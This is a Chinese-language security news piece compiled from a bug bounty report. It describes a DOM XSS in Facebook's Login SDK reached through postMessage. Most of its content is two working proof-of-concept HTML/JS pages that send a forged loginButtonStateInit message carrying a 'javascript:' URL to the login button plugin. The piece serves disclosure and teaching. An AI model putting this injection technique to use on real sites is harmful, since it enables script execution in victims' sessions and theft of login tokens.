其他
算捡漏么?我发现了一个值2万美金的 Facebook DOM XSS 漏洞
通过 postMessage造成的 DOM XSS 漏洞是一个被低估的漏洞,很多漏洞猎人基本不会注意这个漏洞。
Third-Party website + (Facebook Login SDK for JavaScript)<iframe src='https://www.facebook.com/v6.0/plugins/login_button.php?app_id=APP_ID&button_type=continue_with&channel=REDIRECT_URL&sdk=joey'></iframe> ↓
The Facebook Javascript SDK sends the initial payload to the iframe proxy.iframe.contentWindow.postMessage({"xdArbiterHandleMessage":true,"message":{"method":"loginButtonStateInit","params":JSON.stringify({'call':{'id':'INT_ID','url':'https://www.facebook.com/v7.0/dialog/oauth?app_id=APP_ID&SOME_OTHER_PARAMS','size':{'width':10,'height':10},'dims':{'screenX':0,'screenY':23,'outerWidth':1680,'outerHeight':971'screenWidth':1680}}})},"origin":"APP_DOMAIN"}, '*')↓
When an user clicks Login with Facebook button,window.open('https://www.facebook.com/v7.0/dialog/oauth?app_id=APP_ID')happens on the proxy iframe. Which is the url from postMessage payload↓
The popup window sends the accesstoken and signed-request to the third-party website by window.opener.parent.postMessage(result, origin)
i.url = i.url.replace(/cbt=\d+/, "cbt=" + a);a = window.open(i.url, i.id, b("buildPopupFeatureString")(i));利用 iframe
<script> var opener = window.open("https://www.facebook.com/v6.0/plugins/login_button.php?app_id=APP_ID&auto_logout_link=false&button_type=continue_with&channel=REDIRECT_URL&container_width=734&locale=en_US&sdk=joey&size=large&use_continue_as=true","opener", "scrollbars=no,resizable=no,status=no,location=no,toolbar=no,menubar=no,width=500,height=1"); setTimeout(function(){ var message = {"xdArbiterHandleMessage":true,"message":{"method":"loginButtonStateInit","params":JSON.stringify({'call':{'id':'123','url':'javascript:alert(document.domain);','size':{'width':10,'height':10},'dims':{'screenX':0,'screenY':23,'outerWidth':1680,'outerHeight':971,'screenWidth':1680}}})},"origin":"ORIGIN"}; opener.postMessage(message, '*'); },'4000');</script><script>function fbFrameLoaded() { var iframeEl = document.getElementById('fbframe'); var message = {"xdArbiterHandleMessage":true,"message":{"method":"loginButtonStateInit","params":JSON.stringify({'call':{'id':'123','url':'javascript:alert(document.domain);','size':{'width':10,'height':10},'dims':{'screenX':0,'screenY':23,'outerWidth':1680,'outerHeight':971,'screenWidth':1680}}})},"origin":"ORIGIN"}; iframeEl.contentWindow.postMessage(message, '*');};</script><iframe id="fbframe" src="https://www.facebook.com/v6.0/plugins/login_button.php?app_id=APP_ID&auto_logout_link=false&button_type=continue_with&channel=REDIRECT_URL&container_width=734&locale=en_US&sdk=joey&size=large&use_continue_as=true" onload="fbFrameLoaded(this)"></iframe>时间轴
https://javascript.info/cross-window-communication
https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/
https://ngailong.wordpress.com/2018/02/13/the-mystery-of-postmessage/
https://vinothkumar.me/20000-facebook-dom-xss/
题图:Pixabay License
本文由奇安信代码卫士编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 www.codesafe.cn”。
奇安信代码卫士 (codesafe)
国内首个专注于软件开发安全的
产品线。